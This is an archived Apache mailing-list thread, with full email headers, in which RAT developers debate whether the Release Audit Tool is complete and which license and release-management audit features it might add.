apache.org On 17 Aug 2010, at 06:10, Stefan Bodewig <[email protected]> wrote: > [splitting this part out of the thread because it would distract from > the rest of my response in a different email] > > On 2010-08-16, Ross Gardler wrote: > >> Although note I'm only a mentor and early contributor, not a >> committed. > > You are one of the four committers who have been voted in last December, > together with Gav, Niall and David. > > Stefan Really? Oh that makes me a pretty crap mentor then ;-) Sent from my mobile device. From [email protected] Tue Aug 17 07:56:13 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21753 invoked from network); 17 Aug 2010 07:56:13 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 07:56:13 -0000 Received: (qmail 90517 invoked by uid 500); 17 Aug 2010 07:56:13 -0000 Delivered-To: [email protected] Received: (qmail 90471 invoked by uid 500); 17 Aug 2010 07:56:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90463 invoked by uid 99); 17 Aug 2010 07:56:10 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 07:56:10 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=MIME_QP_LONG_LINE,RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO cpanelsmarthost1.zen.co.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 07:56:02 +0000 Received: from [161.129.204.104] (helo=zencphosting06.zen.co.uk) by cpanelsmarthost1.zen.co.uk with esmtp (Exim 4.69) (envelope-from <[email protected]>) id 1OlH1J-00009u-FO for [email protected]; Tue, 17 Aug 2010 07:55:41 +0000 Received: from 5addf462.bb.sky.com ([161.129.204.104] helo=[161.129.204.104]) by zencphosting06.zen.co.uk with esmtps (TLSv1:AES128-SHA:128) (Exim 4.69) (envelope-from <[email protected]>) id 1OlH1J-0007KB-5N for [email protected]; Tue, 17 Aug 2010 08:55:41 +0100 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Mime-Version: 1.0 (iPhone Mail 8A293) Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=us-ascii Message-Id: <[email protected]> Cc: "[email protected]" <[email protected]> X-Mailer: iPhone Mail (8A293) From: Ross Gardler <[email protected]> Subject: Re: Part 2: Future of RAT Date: Tue, 17 Aug 2010 08:55:31 +0100 To: "[email protected]" <[email protected]> X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - zencphosting06.zen.co.uk X-AntiAbuse: Original Domain - incubator.apache.org X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - apache.org On 17 Aug 2010, at 06:28, Stefan Bodewig <[email protected]> wrote: > On 2010-08-16, Ross Gardler wrote: >=20 >> I think the general "RAT is great" vibe of the discussion was >> misrepresentative of what RAT currently is. There is not much to RAT >> at present other than a very complex pattern matcher that ensures >> license headers are present. >=20 >> It does not audit releases and to pretend it does is dangerous. >=20 > Many, many thanks Ross. I finally start getting the whole thread. All > the time I knew I must be missing something but completely failed to > grasp that people were looking at RAT for more than what it currently > is. >=20 > I completely agree with your description of RAT's current state but I > never expected it to be more - that's why I said its scope (not its code > base) was too small for a TLP. >=20 >> So where is RAT going with respect to functionality. Is it really >> "complete" in it's current form, as some people have suggested? >=20 > As one of the people who suggested it was complete, my answer is yes, > but only because I never envisioned RAT to be more. >=20 > I just re-read <http://wiki.apache.org/incubator/RatProposal> and > obviously RAT is not there, yet. OTOH I doubt that extending RAT beyond > what it currently does is on anybody's agenda, at least it is not on > mine. >=20 > Stefan Well, the reason I wanted to mentor the project was because I want an audit t= ool, and not just a release audit tool. I want tools that help with identify= ing and tracking communities.=20 Something where I could say "are we overlooking a potential committer" or "d= o any committers appear to have gone emeritus without telling us".=20 I'm still interested in that, the question is whether or not I'll ever find t= he time to actually work on it. We all know desires and wishes don't write c= ode.=20 Ross= From [email protected] Tue Aug 17 09:34:13 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66308 invoked from network); 17 Aug 2010 09:34:12 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 09:34:12 -0000 Received: (qmail 97022 invoked by uid 500); 17 Aug 2010 09:34:12 -0000 Delivered-To: [email protected] Received: (qmail 96974 invoked by uid 500); 17 Aug 2010 09:34:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96966 invoked by uid 99); 17 Aug 2010 09:34:09 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 09:34:09 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 09:34:03 +0000 Received: by qyk11 with SMTP id 11so459849qyk.6 for <[email protected]>; Tue, 17 Aug 2010 02:33:42 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=5jYXkwafKIWPPtBhZo/XhMBEKlZat+exfuesjgg9oas=; b=EI9/kVRX6SQ+OsnhC6irnxzdbry32PTgwFzxnmH2S3aU++NtP7fkUTTN0+mk+y3hgz g0ika0xMEzZzYCe0pHRe3M9D5dMAzF/hRWECFX/aSCMqP9qUYiwCiFCXKna4k/AAlMtL RDMSIfI+Zzy/upVV75sTHu5UavfldgD/X6n1E= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=pLWzOMzMRp4tSjESlTG4nUoDf8Lqj60AOuUeEuiBcWT3zJmDZT987OOqp3cEi0Rr01 P8sVyVGPYtlWqRIEO97sOa5AO/PWorEY2WU2bdO7sRMdRrIMXpVF14vlMpmn4Gxcv/jS PzoM5FnJPJsbXzM8C6eZ3/Xkjoa8xqy7Ypr8U= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id p5mr4104004qag.347.1282037622440; Tue, 17 Aug 2010 02:33:42 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 17 Aug 2010 02:33:42 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Tue, 17 Aug 2010 11:33:42 +0200 Message-ID: <[email protected]> Subject: Re: Part 2: Future of RAT From: Jochen Wiedmann <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable On Mon, Aug 16, 2010 at 11:36 PM, Ross Gardler <[email protected]> wrote: > So where is RAT going with respect to functionality. Is it really "comple= te" in it's current form, as some people have suggested? > > Don't get me wrong, it's a great tool for a very limited use case (I do u= se it outside the ASF), but a top level project that stops at that function= ality is not likely to draw more patches from me since there are other more= complete tools that fill my wider audit needs (albeit not Apache licensed)= . AFAIK, you're the first one to mention such thoughts. At least, I am unaware of any feature requests or something similar. I'd be interested in that discussion, but it is unclear to me, whether we are opening a second discussion here or whether this actually is part of the question, whether, when and how to leave the Incubator. Jochen --=20 I Am What I Am And That's All What I Yam (Popeye) From [email protected] Tue Aug 17 10:04:41 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76203 invoked from network); 17 Aug 2010 10:04:41 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 10:04:41 -0000 Received: (qmail 25828 invoked by uid 500); 17 Aug 2010 10:04:41 -0000 Delivered-To: [email protected] Received: (qmail 25778 invoked by uid 500); 17 Aug 2010 10:04:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25770 invoked by uid 99); 17 Aug 2010 10:04:38 -0000 Received: from Unknown (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 10:04:38 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO relay6.mail.ox.ac.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 10:04:13 +0000 Received: from smtp0.mail.ox.ac.uk ([161.129.204.104]) by relay6.mail.ox.ac.uk with esmtp (Exim 4.71) (envelope-from <[email protected]>) id 1OlJ1N-0007UH-LH for [email protected]; Tue, 17 Aug 2010 11:03:53 +0100 Received: from oucs-sander2.oucs.ox.ac.uk ([161.129.204.104]) by smtp0.mail.ox.ac.uk with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1OlJ1N-0002sb-1W for [email protected]; Tue, 17 Aug 2010 11:03:53 +0100 Message-ID: <[email protected]> Date: Tue, 17 Aug 2010 11:03:55 +0100 From: Ross Gardler <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:161.129.204.104) Gecko/20100711 Thunderbird/3.0.6 MIME-Version: 1.0 To: [email protected] Subject: Re: Part 2: Future of RAT References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Oxford-Username: oucs0040 X-Virus-Checked: Checked by ClamAV on apache.org On 17/08/2010 10:33, Jochen Wiedmann wrote: > On Mon, Aug 16, 2010 at 11:36 PM, Ross Gardler<[email protected]> wrote: > >> So where is RAT going with respect to functionality. Is it really "complete" in it's current form, as some people have suggested? >> >> Don't get me wrong, it's a great tool for a very limited use case (I do use it outside the ASF), but a top level project that stops at that functionality is not likely to draw more patches from me since there are other more complete tools that fill my wider audit needs (albeit not Apache licensed). > > AFAIK, you're the first one to mention such thoughts. At least, I am > unaware of any feature requests or something similar. It's called Release Audit Tool and the original proposal was quite broad in scope. Ross -- [email protected] @rgardler From [email protected] Tue Aug 17 10:10:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82637 invoked from network); 17 Aug 2010 10:10:51 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 10:10:51 -0000 Received: (qmail 33241 invoked by uid 500); 17 Aug 2010 10:10:51 -0000 Delivered-To: [email protected] Received: (qmail 33199 invoked by uid 500); 17 Aug 2010 10:10:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33191 invoked by uid 99); 17 Aug 2010 10:10:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 10:10:49 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f182.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 10:10:42 +0000 Received: by qyk4 with SMTP id 4so737942qyk.6 for <[email protected]>; Tue, 17 Aug 2010 03:10:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=u9OySy/3M2P9/HeAzub1lzqnCWIQFkr87hKXW5JkY8g=; b=q7mY6+jDRWVby35RHEWZx/QqY+utVOA/+ik9LuNRiYMDXqsXdXJXcr+6PVKdUW2tsu FxShrGLbvM9pjL/hBCBXDo4DjV7oaTSIon2jWML5zlUVbNlKWkU1cI5XLZBy1SmSKbtQ zjyjXMYKN/EMQpCzMUL3NrN1leFD28Gx2H/oM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=ZNq0wkWxHmuE24HCeEef0mRu38x5WGeJGdZOyp6MbQZXrWKB1/TlAqTV6eyt7mm0Fh ECBH6BGHMirIyGFAtwjAK5SRsHjAUHJjXd6iteZtduBmdSSHFh/+vLwUwgpczSkQqxoM z3cmiZL1EoN6/tLlgjmbhRrsi/QHDpiTgeVp4= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id ie21mr4641731qcb.135.1282039821341; Tue, 17 Aug 2010 03:10:21 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 17 Aug 2010 03:10:20 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Tue, 17 Aug 2010 12:10:20 +0200 Message-ID: <[email protected]> Subject: Re: Part 2: Future of RAT From: Jochen Wiedmann <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 On Tue, Aug 17, 2010 at 12:03 PM, Ross Gardler <[email protected]> wrote: > It's called Release Audit Tool and the original proposal was quite broad in > scope. I'm a plain stupid developer who has used RAT since quite some time without additional ambitions. Tell me what you'd expect, not what's written in a proposal, please. Jochen -- I Am What I Am And That's All What I Yam (Popeye) From [email protected] Tue Aug 17 11:46:57 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12385 invoked from network); 17 Aug 2010 11:46:57 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 11:46:57 -0000 Received: (qmail 48570 invoked by uid 500); 17 Aug 2010 11:46:57 -0000 Delivered-To: [email protected] Received: (qmail 48523 invoked by uid 500); 17 Aug 2010 11:46:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48515 invoked by uid 99); 17 Aug 2010 11:46:55 -0000 Received: from Unknown (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 11:46:55 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO relay4.mail.ox.ac.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 11:46:30 +0000 Received: from smtp0.mail.ox.ac.uk ([161.129.204.104]) by relay4.mail.ox.ac.uk with esmtp (Exim 4.71) (envelope-from <[email protected]>) id 1OlKcM-0000k8-EO for [email protected]; Tue, 17 Aug 2010 12:46:10 +0100 Received: from oucs-sander2.oucs.ox.ac.uk ([161.129.204.104]) by smtp0.mail.ox.ac.uk with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1OlKcM-0004fn-0R for [email protected]; Tue, 17 Aug 2010 12:46:10 +0100 Message-ID: <[email protected]> Date: Tue, 17 Aug 2010 12:46:15 +0100 From: Ross Gardler <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:161.129.204.104) Gecko/20100711 Thunderbird/3.0.6 MIME-Version: 1.0 To: [email protected] Subject: Re: Part 2: Future of RAT References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Oxford-Username: oucs0040 X-Virus-Checked: Checked by ClamAV on apache.org On 17/08/2010 11:10, Jochen Wiedmann wrote: > On Tue, Aug 17, 2010 at 12:03 PM, Ross Gardler<[email protected]> wrote: > >> It's called Release Audit Tool and the original proposal was quite broad in >> scope. > > I'm a plain stupid developer who has used RAT since quite some time > without additional ambitions. Tell me what you'd expect, not what's > written in a proposal, please. This thread has taken a turn away from my original post. I did not say that I expect more of the RAT community, I asked is it done? I asked because the answer affects the future of RAT which is the topic of this thread. It is clearly not done with respect to the original proposal, but it is clearly a useful tool. One that adds to the utility of the perl scripts that did exactly the same header checks before RAT exists. I have no problem with people stating it is done and leaving it as is. What I want to know is "is that it?" If it is then it is not an audit tool, it is a license header checker and we need to be careful about people thinking it is more. Finally, I'm happy to answer the question of what I would like it to do. I hinted at a couple of issues that go beyond the original proposal in my first post but I don't want to derail a discussion about the future home of RAT with detailed technical discussion about what new features the tool might have. So for now I'd rather keep the question simple: "Is it done?" Ross From [email protected] Tue Aug 17 11:56:40 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13696 invoked from network); 17 Aug 2010 11:56:40 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 11:56:40 -0000 Received: (qmail 55187 invoked by uid 500); 17 Aug 2010 11:56:40 -0000 Delivered-To: [email protected] Received: (qmail 55142 invoked by uid 500); 17 Aug 2010 11:56:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55134 invoked by uid 99); 17 Aug 2010 11:56:38 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 11:56:38 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f182.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 11:56:31 +0000 Received: by qyk4 with SMTP id 4so825604qyk.6 for <[email protected]>; Tue, 17 Aug 2010 04:56:11 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=7YjHnOvAxkr4tgap79LRvJnesTeZW1vUempBYT/UHQA=; b=YODfIC3L8XYDsiyCaqEpwOE2OoEUuxKApiIXY/vuHAXS1DdAHvIXuQ29A4TLzvwtJN Sg/VrRVOeuAYWSYXUQVti0vANMBsJhBHk3hjHAmdh+umRRMD7K71v89Fh5s1uusD0A95 FAfj4B7j9TYnRBPRo5RyWxcwrwRQSURC6JMcY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=vwTPUWwabWX43+EZa+BzgsSfk+OEU4CeCaezwxDk+mwiq4Adovar72L3dpfeaYmYwm VHliK2xRDbpqwZTiQy79J+6CNHRZOs1nk1lC/PBCvLej41siUclKWjM6XdLeEZzBCmgM kr66ff/9nrQf70+ko6YeaAVeJ2ikLw8Zg04vc= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id m18mr4251635qaq.220.1282046170855; Tue, 17 Aug 2010 04:56:10 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 17 Aug 2010 04:56:10 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Tue, 17 Aug 2010 13:56:10 +0200 Message-ID: <[email protected]> Subject: Re: Part 2: Future of RAT From: Jochen Wiedmann <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 On Tue, Aug 17, 2010 at 1:46 PM, Ross Gardler <[email protected]> wrote: > So for now I'd rather keep the question simple: > > "Is it done?" And that's exactly the question I cannot answer. You seem to have a bigger vision for what RAT *could* do. And I cannot share that vision, because I have no idea what that might mean technically. I've been RM for a lot of Apache projects. I'd welcome ideas how to improve the process. But I don't know what you expected from the "original proposal". Hence no possibility for me to answer whether "it is done". Jochen -- I Am What I Am And That's All What I Yam (Popeye) From [email protected] Tue Aug 17 12:24:11 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34621 invoked from network); 17 Aug 2010 12:24:11 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 12:24:11 -0000 Received: (qmail 97937 invoked by uid 500); 17 Aug 2010 12:24:11 -0000 Delivered-To: [email protected] Received: (qmail 97887 invoked by uid 500); 17 Aug 2010 12:24:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97879 invoked by uid 99); 17 Aug 2010 12:24:09 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 12:24:09 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO relay6.mail.ox.ac.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 12:24:01 +0000 Received: from smtp2.mail.ox.ac.uk ([161.129.204.104]) by relay6.mail.ox.ac.uk with esmtp (Exim 4.71) (envelope-from <[email protected]>) id 1OlLCd-0000qU-MX for [email protected]; Tue, 17 Aug 2010 13:23:40 +0100 Received: from oucs-sander2.oucs.ox.ac.uk ([161.129.204.104]) by smtp2.mail.ox.ac.uk with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1OlLCd-0000kC-9K for [email protected]; Tue, 17 Aug 2010 13:23:39 +0100 Message-ID: <[email protected]> Date: Tue, 17 Aug 2010 13:23:44 +0100 From: Ross Gardler <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:161.129.204.104) Gecko/20100711 Thunderbird/3.0.6 MIME-Version: 1.0 To: [email protected] Subject: Re: Part 2: Future of RAT References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Oxford-Username: oucs0040 On 17/08/2010 12:56, Jochen Wiedmann wrote: > On Tue, Aug 17, 2010 at 1:46 PM, Ross Gardler<[email protected]> wrote: > >> So for now I'd rather keep the question simple: >> >> "Is it done?" > > And that's exactly the question I cannot answer. You seem to have a > bigger vision for what RAT *could* do. And I cannot share that vision, > because I have no idea what that might mean technically. OK, fair enough. I'll answer your question then. For me an audit tool will assist an RM, at present RAT assists developers with license headers. So audit focussed features might include: - identify (potentially) incompatible licenses in releases - ensure notice files are complete - ensure all copies of bundled libraries have their licences present - ensure version numbers have been correctly updated - check distributions are signed properly - ??? Added "nice to have" extras that go beyond release audit could include: - ensuring all developers are appropriately credited - build change logs - uploading verified distribution files - test downloads have been mirrored correctly - sending notification mails - maybe even provide a full release management workflow tool Obviously the list could go on forever and hence my question, is it done? The design of RAT makes it quite easy to do the very first of these (check for other headers and compare against a compatibility table), but even though I want it I've never found the time to do it. Yet I do use RAT. Hence my question "is it done?" Personally I'd love to see RAT grow into a genuine Audit tool. Just this week I needed to use one because someone claimed one of my releases had a GPL file in it. It took 10 minutes with a real license audit tool [1] to tell me they were false positives from Ohloh. Why not use that Audit tool? All it does it check for licence headers. It's essentially RAT with a front end and more complete matchers. I would like to see more (see above) Flossology is GPL, hence I like the idea of RAT being a full license audit tool and possibly more. However, as I said earlier, my wishes and desires don't write code ;-) Ross [1] http://www.fossology.org From [email protected] Tue Aug 17 13:43:39 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69590 invoked from network); 17 Aug 2010 13:43:39 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 13:43:39 -0000 Received: (qmail 32948 invoked by uid 500); 17 Aug 2010 13:43:39 -0000 Delivered-To: [email protected] Received: (qmail 32890 invoked by uid 500); 17 Aug 2010 13:43:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32882 invoked by uid 99); 17 Aug 2010 13:43:36 -0000 Received: from Unknown (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 13:43:36 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail-qw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 13:43:13 +0000 Received: by qwi2 with SMTP id 2so994311qwi.6 for <[email protected]>; Tue, 17 Aug 2010 06:42:51 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id hb18mr4886980qcb.68.1282052564280; Tue, 17 Aug 2010 06:42:44 -0700 (PDT) Sender: [email protected] Received: by 161.129.204.104 with HTTP; Tue, 17 Aug 2010 06:42:44 -0700 (PDT) X-Originating-IP: [161.129.204.104] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Tue, 17 Aug 2010 08:42:44 -0500 X-Google-Sender-Auth: zZU52UkjSGsA0kgQz0p4ZS0Hl_8 Message-ID: <[email protected]> Subject: Re: Part 2: Future of RAT From: "Hyrum K. Wright" <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 X-Virus-Checked: Checked by ClamAV on apache.org On Tue, Aug 17, 2010 at 2:55 AM, Ross Gardler <[email protected]> wrote: > Something where I could say "are we overlooking a potential committer" or "do any committers appear to have gone emeritus without telling us". You may be interested in something we've used with Subversion for several years: the contribulyzer. It looks at log messages (which must have a special syntax), and creates a list which easily recognizes the various patches people have contributed, or even ideas or bugs they have found. The current output is here: http://www.red-bean.com/svnproject/contribulyzer/ -Hyrum From [email protected] Tue Aug 17 13:50:54 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75183 invoked from network); 17 Aug 2010 13:50:54 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 13:50:54 -0000 Received: (qmail 41004 invoked by uid 500); 17 Aug 2010 13:50:54 -0000 Delivered-To: [email protected] Received: (qmail 40956 invoked by uid 500); 17 Aug 2010 13:50:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40948 invoked by uid 99); 17 Aug 2010 13:50:51 -0000 Received: from Unknown (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 13:50:51 +0000 X-ASF-Spam-Status: No, hits=-1.6 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO relay2.mail.ox.ac.uk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 13:50:27 +0000 Received: from smtp1.mail.ox.ac.uk ([161.129.204.104]) by 